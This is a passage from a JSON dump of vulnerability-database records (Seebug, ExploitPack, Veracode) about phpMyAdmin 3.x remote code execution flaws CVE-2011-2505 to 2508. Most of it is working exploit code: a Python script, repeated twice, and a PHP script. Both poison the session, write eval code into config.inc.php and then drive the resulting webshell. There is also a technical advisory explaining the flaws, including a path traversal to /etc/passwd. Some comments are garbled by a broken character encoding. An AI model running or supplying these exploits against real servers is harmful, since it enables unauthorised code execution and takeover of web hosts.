urllib2.urlopen(args[1]+"/index.php").read()\r\n r1 = re.findall("token=(\\w{32})", content)\r\n r2 = re.findall("phpMyAdmin=(\\w{32,40})", content)\r\n \r\n if not r1:\r\n r1 = re.findall("token\\" value=\\"(\\w{32})\\"", content)\r\n if not r2:\r\n r2 = re.findall("phpMyAdmin\\" value=\\"(\\w{32,40})\\"", content)\r\n if len(r1) < 1 or len(r2) < 1:\r\n print "[-] Cannot find form token and session id...exit."\r\n sys.exit(-1)\r\n \r\n token = r1[0]\r\n sessionid = r2[0]\r\n print "[+] Token: %s , SessionID: %s" % (token, sessionid)\r\n \r\n # \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5\r\n print "[+] Trying to insert payload in $_SESSION.."\r\n uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"\r\n url = args[1]+uri\r\n \r\n opener = urllib2.build_opener()\r\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\r\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\r\n(sessionid, sessionid)))\r\n urllib2.install_opener(opener)\r\n urllib2.urlopen(url)\r\n \r\n # \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell\r\n print "[+] Trying get webshell.."\r\n postdata =\r\n"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"\r\n% (sessionid, token)\r\n url = args[1]+"/setup/config.php"\r\n \r\n # print "[+]Postdata: %s" % postdata\r\n urllib2.urlopen(url, postdata)\r\n print "[+] All done, pray for your lucky!"\r\n \r\n # \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell\r\n url = args[1]+"/config/config.inc.php"\r\n opener.addheaders.append(('Code', 'phpinfo();'))\r\n urllib2.install_opener(opener)\r\n print "[+] Trying connect shell: %s" % url\r\n result = re.findall("System \\</td\\>\\<td\r\nclass=\\"v\\"\\>(.*)\\</td\\>\\</tr\\>", urllib2.urlopen(url).read())\r\n if len(result) == 1:\r\n print "[+] Lucky u! System info: %s" % result[0]\r\n print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"\r\n \r\n else:\r\n print "[-] Cannot get webshell."\r\n \r\n except Exception, e:\r\n print e\r\n \r\nif __name__ == "__main__" : main(sys.argv)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20714", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:03:22", "description": "No description provided by source.", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x Swekey Remote Code Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "SSV:20711", "href": "https://www.seebug.org/vuldb/ssvid-20711", "sourceData": "\n <?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \r\n\t _ _ ___ __ ____ __ ___ ___ \r\n\t| |-| || _ |\\ /\\ /| _ || ) \r\n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n\r\nUse responsibly.\r\n\r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n\r\nif(php_sapi_name()==='cli'){\r\n\tif(!isset($argv[1])){\r\n\t\toutput(" Usage\\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");\r\n\t\tkillme();\r\n\t}\r\n\t$pmaurl = $argv[1];\t\r\n}else{\r\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n\toutput('[!] Fatal error. Need cURL!');\r\n\tkillme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=&#9829;>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n\r\noutput("[i] Running...");\r\n\r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\r\n\tCURLOPT_HEADER => 1,\r\n\tCURLOPT_RETURNTRANSFER => 1,\r\n\tCURLOPT_TIMEOUT => 4,\r\n\tCURLOPT_SSL_VERIFYPEER => false,\r\n\tCURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput("[*] Contacting server to retrive session cookie and token.");\r\n\r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n\toutput("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");\r\n\tkillme();\r\n}\r\nif(!$result){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n\toutput("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");\r\n\tkillme();\r\n}\r\n\r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput("[i] Cookie:".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput("[i] Token:".$token);\r\n\r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput("[*] Contacting server to make it save the injected code to a file.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput("[*] Contacting server to test if the injected code executes.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n\toutput("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");\r\n\toutput("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");\r\n}else{\r\n\toutput("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");\r\n}\r\n\r\n\r\ncurl_close($ch);\r\n\r\nfunction output($msg){\r\n\techo php_sapi_name()!=='cli'?htmlspecialchars("$msg\\n",ENT_QUOTES):"$msg\\n";\r\n\tflush();\r\n}\r\n\r\nfunction killme(){\r\n\toutput("[*] Exiting...");\r\n\techo php_sapi_name()!=='cli'?'<pre>':'';\r\n\tdie();\r\n}\r\n\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20711", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:03:13", "description": "No description provided by source.", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x Multiple Remote Code Executions", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2011-07-09T00:00:00", "id": "SSV:20710", "href": "https://www.seebug.org/vuldb/ssvid-20710", "sourceData": "\n File: libraries/auth/swekey/swekey.auth.lib.php\r\nLines: 266-276\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Variable Manipulation\r\nAssigned CVE id: CVE-2011-2505\r\nPMA Announcement-ID: PMASA-2011-5\r\n266\tif (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)\r\n267\t{\r\n268\t parse_str($_SERVER['QUERY_STRING']);\r\n269\t session_write_close();\r\n270\t session_id($session_to_unset);\r\n271\t session_start();\r\n272\t $_SESSION = array();\r\n273\t session_write_close();\r\n274\t session_destroy();\r\n275\t exit;\r\n276\t}\r\nNotice the call to parse_str on line 268 that passes the query string as it's first argument. It's missing a second argument. This means that what ever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit there ain't much to exploit. However the session variables persists between requests. Thus giving us full control of the $_SESSION array.\r\n\r\nFrom here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities.\r\n\r\n\r\nThe second vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Remote Static Code Injection\r\nAssigned CVE id: CVE-2011-2506\r\nPMA Announcement-ID: PMASA-2011-6\r\n\r\nFile: setup/lib/ConfigGenerator.class.php\r\nLines: 16-78\r\n16\t/**\r\n17\t * Creates config file\r\n18\t *\r\n19\t * @return string\r\n20\t */\r\n21\tpublic static function getConfigFile()\r\n22\t{\r\n23\t $cf = ConfigFile::getInstance();\r\n24\t \r\n25\t $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\\r\\n" : "\\n";\r\n26\t $c = $cf->getConfig();\r\n27\t \r\n28\t // header\r\n29\t $ret = 'get('PMA_VERSION')\r\n34\t . ' setup script' . $crlf\r\n35\t . ' * Date: ' . date(DATE_RFC1123) . $crlf\r\n36\t . ' */' . $crlf . $crlf;\r\n37\t \r\n38\t // servers\r\n39\t if ($cf->getServerCount() > 0) {\r\n40\t $ret .= "/* Servers configuration */$crlf\\$i = 0;" . $crlf . $crlf;\r\n41\t foreach ($c['Servers'] as $id => $server) {\r\n42\t $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf\r\n43\t . '$i++;' . $crlf;\r\n44\t foreach ($server as $k => $v) {\r\n45\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n46\t $ret .= "\\$cfg['Servers'][\\$i]['$k'] = "\r\n47\t . (is_array($v) && self::_isZeroBasedArray($v)\r\n48\t ? self::_exportZeroBasedArray($v, $crlf)\r\n49\t : var_export($v, true))\r\n50\t . ';' . $crlf;\r\n51\t }\r\n52\t $ret .= $crlf;\r\n53\t }\r\n54\t $ret .= '/* End of servers configuration */' . $crlf . $crlf;\r\n55\t }\r\n56\t unset($c['Servers']);\r\n57\t \r\n58\t // other settings\r\n59\t $persistKeys = $cf->getPersistKeysMap();\r\n60\t \r\n61\t foreach ($c as $k => $v) {\r\n62\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n63\t $ret .= self::_getVarExport($k, $v, $crlf);\r\n64\t if (isset($persistKeys[$k])) {\r\n65\t unset($persistKeys[$k]);\r\n66\t }\r\n67\t }\r\n68\t // keep 1d array keys which are present in $persist_keys (config.values.php)\r\n69\t foreach (array_keys($persistKeys) as $k) {\r\n70\t if (strpos($k, '/') === false) {\r\n71\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n72\t $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf);\r\n73\t }\r\n74\t }\r\n75\t $ret .= '?>';\r\n76\t \r\n77\t return $ret;\r\n78\t}\r\nOn line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code.\r\nOn line 26 the $c array is created from a call to $cf->getConfig().\r\n\r\nFile: libraries/config/ConfigFile.class.php\r\nLines: 469-482\r\n469\t/**\r\n470\t * Returns configuration array (full, multidimensional format)\r\n471\t *\r\n472\t * @return array\r\n473\t */\r\n474\tpublic function getConfig()\r\n475\t{\r\n476\t $c = $_SESSION[$this->id];\r\n477\t foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) {\r\n478\t PMA_array_write($map_to, $c, PMA_array_read($map_from, $c));\r\n479\t PMA_array_remove($map_from, $c);\r\n480\t }\r\n481\t return $c;\r\n482\t}\r\nBingo! The $c array is derived from the $_SESSION array hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. Then we would just browse to this file and the webserver would executed it.\r\n\r\nThis vulnerability requires one specific condition. The config directory must have been left in place after the initial configuration. This is something advised against and hence a majority of servers wont be susceptible to this attack. Therefor we'll check out a third and a fourth vulnerability.\r\n\r\n\r\nThe third vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Authenticated Remote Code Execution\r\nAssigned CVE id: CVE-2011-2507\r\nPMA Announcement-ID: PMASA-2011-7\r\n\r\nFile: server_synchronize.php\r\nLine: 466\r\n466\t$trg_db = $_SESSION['trg_db'];\r\nLine: 477\r\n477\t$uncommon_tables = $_SESSION['uncommon_tables'];\r\nLine: 674\r\n674\tPMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false);\r\nFile: libraries/server_synchronize.lib.php\r\nLines: 613-631\r\n613\tfunction PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display)\r\n614\t{\r\n615\t if (isset($uncommon_tables[$table_index])) {\r\n616\t $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link);\r\n617\t $fields = array();\r\n618\t foreach ($fields_result as $each_field) {\r\n619\t $field_name = $each_field['Field'];\r\n620\t $fields[] = $field_name;\r\n621\t }\r\n622\t $uncommon_tables_fields[$table_index] = $fields;\r\n623\t \r\n624\t $Create_Query = PMA_DBI_fetch_value("SHOW CREATE TABLE " . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link);\r\n625\t \r\n626\t // Replace the src table name with a `dbname`.`tablename`\r\n627\t $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/',\r\n628\t PMA_backquote($trg_db) . '.' .PMA_backquote($uncommon_tables[$table_index]),\r\n629\t $Create_Query,\r\n630\t $limit = 1\r\n631\t );\r\nThe variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject what ever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into a remote code execution. Basicly we can inject the "e" modifier into the regexp pattern which causes the second argument to be executed as PHP code.\r\n\r\nThis vulnerability have two major restrictions from an attackers perspective. First the Suhosin patch that completly defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need to have previous knowledge of credentials to an account of the database that phpMyAdmin is set up to manage. Except for some obscure configurations that allows us to bypass this restriction.\r\n\r\nSince the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability.\r\n\r\n\r\nThe fourth vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Path Traversal\r\nAssigned CVE id: CVE-2011-2508\r\nPMA Announcement-ID: PMASA-2011-8\r\n\r\nFile: libraries/display_tbl.lib.php\r\nLines: 1291-1299\r\n1291\tif ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) {\r\n1292\t \r\n1293\t if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) {\r\n1294\t $include_file = $GLOBALS['mime_map'][$meta->name]['transformation'];\r\n1295\t \r\n1296\t if (file_exists('./libraries/transformations/' . $include_file)) {\r\n1297\t $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']);\r\n1298\t \r\n1299\t require_once './libraries/transformations/' . $include_file;\r\nThis fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to "../../../../../../etc/passwd" the local passwd-file could show up.\r\n\r\nThis vulnerability can only be reached if we're authenticated and requires that the transformation feature is setup correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability.\r\n\r\nFile: libraries/display_tbl.lib.php\r\nLines: 707-710\r\n707\tif ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) {\r\n708\t require_once './libraries/transformations.lib.php';\r\n709\t $GLOBALS['mime_map'] = PMA_getMIME($db, $table);\r\n710\t}\r\nAnd the fact that $GLOBALS['mime_map'] is conditionally initialized together with the fact that phpMyAdmin registers all request variables in the global namespace (blacklists some, but not mime_map) allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not setup correctly.\r\n\r\n\r\nSummary\r\n\r\n If the config folder is left in place, phpMyAdmin is vulnerable.\r\n\r\n If an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable.\r\n\r\n If an attacker has access to database credentials and knows how to exploit a local file inclution, phpMyAdmin is vulnerable.\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20710", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:00", "description": "CVE ID: CVE-2011-2505,CVE-2011-2506,CVE-2011-2507,CVE-2011-2508\r\n\r\nphpMyAdmin\u662f\u7528PHP\u7f16\u5199\u7684\u5de5\u5177\uff0c\u7528\u4e8e\u901a\u8fc7WEB\u7ba1\u7406MySQL\u3002\r\n\r\nphpMyAdmin\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u7528\u6237\u5229\u7528\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u5e76\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n\r\n1\uff09libraries/auth/swekey/swekey.auth.lib.php\u4e2d\u7684"Swekey_login()"\u51fd\u6570\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u88ab\u5229\u7528\u8986\u76d6\u4f1a\u8bdd\u53d8\u91cf\u5e76\u6ce8\u5165\u548c\u6267\u884c\u4efb\u610fPHP\u4ee3\u7801\uff1b\r\n\r\n2\uff09\u4f20\u9012\u5230libraries/server_synchronize.lib.php\u4e2d\u7684"PMA_createTargetTables()"\u51fd\u6570\u7684\u8f93\u5165\u5728\u8c03\u7528\u5e26\u6709e\u4fee\u9970\u7b26\u7684"preg_replace()"\u51fd\u6570\u4e4b\u524d\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\uff0c\u53ef\u88ab\u5229\u7528\u901a\u8fc7URL\u7f16\u7801\u7684NULL\u5b57\u8282\u6267\u884c\u4efb\u610fPHP\u4ee3\u7801\uff1b\r\n\r\n3\uff09\u4f20\u9012\u5230libraries/display_tbl.lib.php\u4e2d\u7684"PMA_displayTableBody()"\u51fd\u6570\u7684\u8f93\u5165\u5728\u7528\u4e8e\u5305\u62ec\u6587\u4ef6\u4e4b\u524d\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\uff0c\u53ef\u88ab\u5229\u7528\u901a\u8fc7\u76ee\u5f55\u904d\u5386\u5e8f\u5217\u5305\u542b\u672c\u5730\u8d44\u6e90\u4e2d\u7684\u4efb\u610f\u6587\u4ef6\u3002\n\nphpMyAdmin 3.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nphpMyAdmin\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.phpmyadmin.net/", "cvss3": {}, "published": "2011-07-07T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x \u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2011-07-07T00:00:00", "id": "SSV:20704", "href": "https://www.seebug.org/vuldb/ssvid-20704", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "veracode": [{"lastseen": "2022-07-27T10:25:14", "description": "php is vulnerable to authorization bypass. The vulnerability exists as an input validation flaw was discovered in the PHP session serializer. If a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session.\n", "cvss3": {}, "published": "2020-04-10T00:53:58", "type": "veracode", "title": "Authorization Bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2022-04-19T18:32:01", "id": "VERACODE:24428", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24428/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin3 (pma3) - Remote Code Execution", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "exploitpack", "title": "phpMyAdmin3 (pma3) - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-08T00:00:00", "id": "EXPLOITPACK:4274B90AFFC9170C6C5F19A5B572681A", "href": "", "sourceData": "#!/usr/bin/env python\n# coding=utf-8\n# pma3 - phpMyAdmin3 remote code execute exploit\n# Author: wofeiwo<wofeiwo@80sec.com>\n# Thx Superhei\n# Tested on: 3.1.1, 3.2.1, 3.4.3\n# CVE: CVE-2011-2505, CVE-2011-2506\n# Date: 2011-07-08\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\n################################################\n\n# Requirements: 1. \"config\" directory must created&writeable in pma directory.\n# 2. session.auto_start = 1 in php.ini configuration.\n\n\nimport os,sys,urllib2,re\n\ndef usage(program):\n print \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\nexecute exploit\"\n print \"Usage: %s <PMA_url>\" % program\n print \"Example: %s http://www.test.com/phpMyAdmin\" % program\n sys.exit(0)\n\ndef main(args):\n try:\n if len(args) < 2:\n usage(args[0])\n\n if args[1][-1] == \"/\":\n args[1] = args[1][:-1]\n\n # \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd\n print \"[+] Trying get form token&session_id..\"\n content = urllib2.urlopen(args[1]+\"/index.php\").read()\n r1 = re.findall(\"token=(\\w{32})\", content)\n r2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content)\n\n if not r1:\n r1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content)\n if not r2:\n r2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content)\n if len(r1) < 1 or len(r2) < 1:\n print \"[-] Cannot find form token and session id...exit.\"\n sys.exit(-1)\n\n token = r1[0]\n sessionid = r2[0]\n print \"[+] Token: %s , SessionID: %s\" % (token, sessionid)\n\n # \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5\n print \"[+] Trying to insert payload in $_SESSION..\"\n uri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\"\n url = args[1]+uri\n\n opener = urllib2.build_opener()\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\n(sessionid, sessionid)))\n urllib2.install_opener(opener)\n urllib2.urlopen(url)\n\n # \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell\n print \"[+] Trying get webshell..\"\n postdata =\n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\"\n% (sessionid, token)\n url = args[1]+\"/setup/config.php\"\n\n # print \"[+]Postdata: %s\" % postdata\n urllib2.urlopen(url, postdata)\n print \"[+] All done, pray for your lucky!\"\n\n # \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell\n url = args[1]+\"/config/config.inc.php\"\n opener.addheaders.append(('Code', 'phpinfo();'))\n urllib2.install_opener(opener)\n print \"[+] Trying connect shell: %s\" % url\n result = re.findall(\"System \\</td\\>\\<td\nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read())\n if len(result) == 1:\n print \"[+] Lucky u! System info: %s\" % result[0]\n print \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\"\n\n else:\n print \"[-] Cannot get webshell.\"\n\n except Exception, 